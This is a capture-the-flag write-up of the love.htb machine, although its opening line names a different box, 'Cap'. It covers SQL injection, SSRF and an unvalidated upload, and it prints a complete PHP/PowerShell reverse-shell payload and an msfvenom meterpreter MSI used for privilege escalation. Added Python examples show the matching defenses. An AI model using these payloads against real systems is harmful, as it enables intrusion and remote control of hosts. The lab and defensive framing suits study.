
There are spoilers below for the Hack The Box box named Cap. Stop reading here if you do not want spoilers!!!


I began with the standard enumeration flow, using nmap:

# Nmap 7.91 scan initiated Wed Jun  9 13:19:10 2021 as: nmap -sC -sV -oA nmap/love
Nmap scan report for
Host is up (0.26s latency).
Not shown: 993 closed ports
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun  9 13:21:32 2021 -- 1 IP address (1 host up) scanned in 142.98 seconds

So, there are a few interesting things to be seen here. Visiting port 80 shows a voting system, port 5000 just shows an Access Denied page, and the SSL certificate on port 443 carries a different name (staging.love.htb).

Voting System (port 80)

I spent a while on this. The first thing I noticed is that the voter field is vulnerable to a time-based SQL injection; using sqlmap I was able to pull the following credentials from it:
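The voter field is injectable because its value is spliced into the SQL text, which is the shape sqlmap's time-based technique exploits. As an added example (my code, not the voting system's PHP or any part of the writeup), the vulnerable pattern sits beside the parameterized fix so the difference is visible on the same input. The in-memory SQLite table, the voter rows and the function names are constructed for illustration; Python is used so the example runs anywhere, even though the box's application is PHP.

```python
import sqlite3

# Constructed in-memory stand-in for the voting system's voter table.
SAMPLE_VOTERS = [
    (1, "alice", "Alice A."),
    (2, "bob", "Bob B."),
]


def make_db():
    """Build a throwaway SQLite database holding the constructed voter rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE voters (id INTEGER, voter_id TEXT, name TEXT)")
    conn.executemany("INSERT INTO voters VALUES (?, ?, ?)", SAMPLE_VOTERS)
    return conn


def lookup_vulnerable(conn, voter_id):
    # The voter field becomes part of the SQL text, so quotes and operators in it
    # change what the query means. A time-based blind injection abuses exactly this.
    sql = "SELECT name FROM voters WHERE voter_id = '" + voter_id + "'"
    return sorted(row[0] for row in conn.execute(sql))


def lookup_safe(conn, voter_id):
    # The value travels as a bound parameter and is never parsed as SQL.
    sql = "SELECT name FROM voters WHERE voter_id = ?"
    return sorted(row[0] for row in conn.execute(sql, (voter_id,)))


def demo():
    """Run the same inputs through both versions and return the results side by side."""
    conn = make_db()
    tautology = "' OR '1'='1"  # constructed input that is not a voter id
    return {
        "normal_vulnerable": lookup_vulnerable(conn, "alice"),
        "normal_safe": lookup_safe(conn, "alice"),
        "tautology_vulnerable": lookup_vulnerable(conn, tautology),
        "tautology_safe": lookup_safe(conn, tautology),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```

The vulnerable lookup returns every row for the tautology input because the quote closes the literal and the rest becomes SQL; the parameterized lookup treats the same string as a (non-existent) voter id and returns nothing. Parameterizing every query the voting system runs against the voter field is the fix for the timing injection as well, since the timing variant is the same splicing observed through response delay.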


Unfortunately, throwing that hash into JTR and Hashcat reveals nothing, so that appears to be a dead end.

Continuing with the voting system enumeration, gobuster reveals several directories with directory listing enabled, plus some additional directories.


Those could both be interesting, but let's check out the other ports first.

File Scanning (staging.love.htb)

After adding staging.love.htb to my /etc/hosts file, I'm able to access this new site. It has a notification system (that doesn't do anything) and a demo file scan. The demo file scan fetches and displays whatever file you give it.

Forbidden (port 5000)

There's another HTTP instance running on port 5000, but whenever I visit this page or attempt to access any subdirectory of it, I simply receive a 403 Forbidden error.

Accessing Forbidden

This part took me a long time to figure out, longer than it likely should have. If you point the file scanner on staging.love.htb at the port 5000 page, the scanner (which runs on the server itself) can access it! It returns:

Vote Admin Creds admin: @LoveIsInTheAir!!!!
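The scanner reached port 5000 because it fetches whatever URL it is handed from the server's own network position, a server-side request forgery (SSRF); the 403 on port 5000 only applied to remote clients. As an added example (my code, not the box's application or any project's), here is the target check a fetcher like that should run before it connects: scheme allowlist, then every address the host maps to is tested against the loopback, private, link-local and reserved ranges. The function names, the injectable resolve hook and the sample addresses are assumptions for illustration, and Python is used so the check runs anywhere even though the scanner itself is PHP.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Only plain web fetches are meaningful for a "file scan" demo; file://, gopher:// etc. are out.
ALLOWED_SCHEMES = {"http", "https"}


def _literal_ip(host):
    """Return an ip_address object if host is an IP literal, else None."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        return None


def _resolve(host):
    # Every address the name maps to. The fetcher must connect to one of these same
    # addresses (or re-run the check after its own lookup) so DNS rebinding cannot slip past.
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def _is_internal(ip):
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def check_fetch_target(url, resolve=_resolve):
    """Return (allowed, reason) for a user-supplied URL the scanner is asked to fetch."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "missing host"
    literal = _literal_ip(host)
    try:
        addrs = {str(literal)} if literal else resolve(host)
    except socket.gaierror:
        return False, "unresolvable host"
    for addr in addrs:
        # getaddrinfo may append an IPv6 scope id ("%eth0"); strip it before parsing.
        ip = ipaddress.ip_address(addr.split("%")[0])
        if _is_internal(ip):
            return False, "target %s is not publicly routable" % addr
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample targets: the loopback port the writeup reached, and a public address.
    for sample in ("http://127.0.0.1:5000/", "http://[::1]:5000/", "file:///etc/hosts", "http://8.8.8.8/"):
        print(sample, check_fetch_target(sample))
```

Two caveats matter in practice. The check has to be applied to the address the HTTP client actually connects to, and again after every redirect, because a public hostname can redirect to or later resolve to 127.0.0.1. And network-level controls (the internal service bound to loopback, an egress allowlist for the fetcher) are the stronger fix; the URL check only narrows the window.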

Vote Login

Given the credentials pulled from the forbidden page, I was then able to access the admin page located at love.htb/admin using the credentials admin:@LoveIsInTheAir!!!!!

Getting a Shell

Now that I have the admin login, it's time to look around. I immediately notice that I can create a user and upload a photo. I wonder whether there's any validation that the upload is actually a photo?

Since this is a PHP website running on a Windows machine (all of which I know from the nmap scan and the file extensions in the URL), I crafted a PHP PowerShell reverse shell payload:


exec("powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('',9000);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush();}\$client.Close()\"");

I then started a listener for the reverse shell:

$ nc -lnvp 9000

And uploaded this PHP file as an image. It worked: there is no validation of the type of file being uploaded at all!!

PS C:\xampp\htdocs\omrs\images> whoami
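The upload succeeded because the photo handler trusted the client-supplied filename and never looked at the bytes. As an added example (my code, not the voting system's PHP or any project's), here is the validation such a handler should apply: extension allowlist, magic-byte sniffing of the content, agreement between the two, a size cap, and a server-generated storage name whose extension comes from the detected type rather than from the client. The function names, the limits and the sample byte strings are constructed for illustration, and Python stands in for the PHP the app would actually use.

```python
import secrets

# Magic-byte signatures for the image types a photo field should accept.
SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
MAX_BYTES = 5 * 1024 * 1024  # assumed cap for a profile photo

# Constructed samples: a PNG signature plus padding (not a real image), and a
# script stand-in representing a non-image file submitted as a "photo".
FAKE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
SCRIPT_UPLOAD = b"<?php echo 'not an image'; ?>"


def detect_image_type(data):
    """Return 'png', 'jpg' or 'gif' from the leading bytes, or None."""
    for kind, prefixes in SIGNATURES.items():
        if any(data.startswith(p) for p in prefixes):
            return kind
    return None


def validate_upload(client_name, data):
    """Return (ok, detected_type_or_reason). Name and content must both pass and agree."""
    if len(data) == 0 or len(data) > MAX_BYTES:
        return False, "bad size"
    # Only the final extension counts, so "x.png.php" is judged by "php".
    ext = client_name.rsplit(".", 1)[-1].lower() if "." in client_name else ""
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed"
    kind = detect_image_type(data)
    if kind is None:
        return False, "content is not a recognised image"
    if ("jpg" if ext == "jpeg" else ext) != kind:
        return False, "extension does not match content"
    return True, kind


def storage_name(kind):
    # Never reuse the client's name; the extension is taken from the detected type.
    return "%s.%s" % (secrets.token_hex(16), kind)


if __name__ == "__main__":
    for name, blob in (("photo.png", FAKE_PNG), ("shell.php", SCRIPT_UPLOAD),
                       ("shell.php.png", SCRIPT_UPLOAD), ("shell.png.php", FAKE_PNG)):
        print(name, validate_upload(name, blob))
```

Two caveats. A file can be a valid image and still contain script text, so magic bytes alone are not a guarantee; re-encoding the upload through an image library, and configuring the web server so nothing under the images directory is ever handed to the PHP interpreter, are the controls that close the gap this writeup exploits. The random storage name also removes the attacker's knowledge of the final path, which the shell upload here depended on.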


Now that I have a low-privilege shell, it's time to begin enumeration again to determine how to move to a SYSTEM shell. After checking a few of the standard enumeration paths, I noticed the following:

PS C:\xampp\htdocs\omrs\images> reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

    AlwaysInstallElevated    REG_DWORD    0x1

PS C:\xampp\htdocs\omrs\images> reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

    AlwaysInstallElevated    REG_DWORD    0x1

Because those values (either one) are set to 1, any user is able to run an .msi installer as SYSTEM! So I then crafted an MSI payload:

$ msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=1234 -f msi > rshell1234.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of msi file: 159744 bytes

$ sudo python3 -m http.server 80
Serving HTTP on port 80 ( ...

Back on Windows, I executed the installer:

> msiexec /q /i

And on my machine I had a Metasploit listener set up:

$ msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost; set lport 1234; run"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/meterpreter/reverse_tcp
lhost =>
lport => 1234
[*] Started reverse TCP handler on 
[*] Sending stage (175174 bytes) to
[*] Meterpreter session 1 opened ( -> at 2021-06-10 20:59:28 -0400

meterpreter > shell
Process 7128 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

nt authority\system


And success! We now have a system shell!!
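For the defender's side of the AlwaysInstallElevated finding, here is an added example (my code, not part of the writeup or any project) that parses the two reg query results shown earlier as a host-inventory script would capture them, decides whether the policy is actually in force, and produces the reg add commands that clear it. Windows Installer honours AlwaysInstallElevated only when both the HKLM and the HKCU values are set to 1, so the assessment requires both. The sample output is constructed from the values shown in the writeup, and the function names are my own.

```python
import re

# Constructed sample: the two `reg query` results from the writeup, as captured by an
# inventory script (hive order and indentation vary between hosts, so parse loosely).
SAMPLE_REG_OUTPUT = r"""
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""

VALUE_RE = re.compile(r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$")
POLICY_KEY = r"Software\Policies\Microsoft\Windows\Installer"


def parse_always_install_elevated(text):
    """Map hive name -> integer AlwaysInstallElevated value; hives without the value are omitted."""
    values = {}
    hive = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.upper().startswith("HKEY_"):
            # A key path line names the hive that the following value lines belong to.
            hive = stripped.split("\\", 1)[0].upper()
            continue
        match = VALUE_RE.match(line)
        if match and hive:
            values[hive] = int(match.group(1), 16)
    return values


def is_exploitable(values):
    # The installer elevates only when BOTH the machine and the user policy are set to 1.
    return (values.get("HKEY_LOCAL_MACHINE") == 1
            and values.get("HKEY_CURRENT_USER") == 1)


def remediation_commands(values):
    """reg.exe commands that set every enabled copy of the value back to 0."""
    return [
        r"reg add %s\%s /v AlwaysInstallElevated /t REG_DWORD /d 0 /f" % (hive, POLICY_KEY)
        for hive, value in sorted(values.items()) if value == 1
    ]


def assess(text):
    """One-call summary suitable for a fleet report."""
    values = parse_always_install_elevated(text)
    return {"values": values, "exploitable": is_exploitable(values),
            "remediation": remediation_commands(values)}


if __name__ == "__main__":
    for key, item in assess(SAMPLE_REG_OUTPUT).items():
        print(key, item)
```

On a real host the text would come from running reg query for each of the two keys and concatenating the output; in Group Policy the same setting lives under Computer Configuration and User Configuration > Administrative Templates > Windows Components > Windows Installer > "Always install with elevated privileges", and turning it off there is preferable to editing the registry directly because policy refresh would otherwise reinstate it. Only the combination of both values being 1 is reported as exploitable, which keeps the finding out of reports for hosts where a single stray value exists.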